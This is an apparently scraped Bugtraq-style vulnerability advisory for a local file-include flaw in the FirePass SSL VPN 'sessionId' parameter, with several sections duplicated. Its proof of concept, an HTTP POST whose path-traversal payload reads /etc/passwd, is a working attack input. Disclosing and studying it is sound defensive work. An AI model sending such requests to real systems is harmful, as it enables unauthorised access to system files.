FirePass SSL VPN 'sessionId' Parameter Local File Include Vulnerability
BID:56779
Info
FirePass SSL VPN 'sessionId' Parameter Local File Include Vulnerability
| Bugtraq ID: | 56779 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 03 2012 12:00AM |
| Updated: | Mar 19 2015 08:52AM |
| Credit: | S. Viehböck of SEC Consult Vulnerability Lab |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
FirePass SSL VPN 'sessionId' Parameter Local File Include Vulnerability
FirePass SSL VPN is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
FirePass SSL VPN 7.0.0 HF-70-6 is vulnerable; other versions may also be affected.
FirePass SSL VPN is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
FirePass SSL VPN 7.0.0 HF-70-6 is vulnerable; other versions may also be affected.
Exploit / POC
FirePass SSL VPN 'sessionId' Parameter Local File Include Vulnerability
An attacker can exploit this issue with a browser.
The following example is available:
POST /CitrixAuth.php HTTP/1.1
Host: www.example.com
Content-Type: application/none
Content-Length: 68
<sessionId>../../../../../etc/passwd </sessionId>
-> <- NULL byte
An attacker can exploit this issue with a browser.
The following example is available:
POST /CitrixAuth.php HTTP/1.1
Host: www.example.com
Content-Type: application/none
Content-Length: 68
<sessionId>../../../../../etc/passwd </sessionId>
-> <- NULL byte
Solution / Fix
FirePass SSL VPN 'sessionId' Parameter Local File Include Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
FirePass SSL VPN 'sessionId' Parameter Local File Include Vulnerability
References:
References: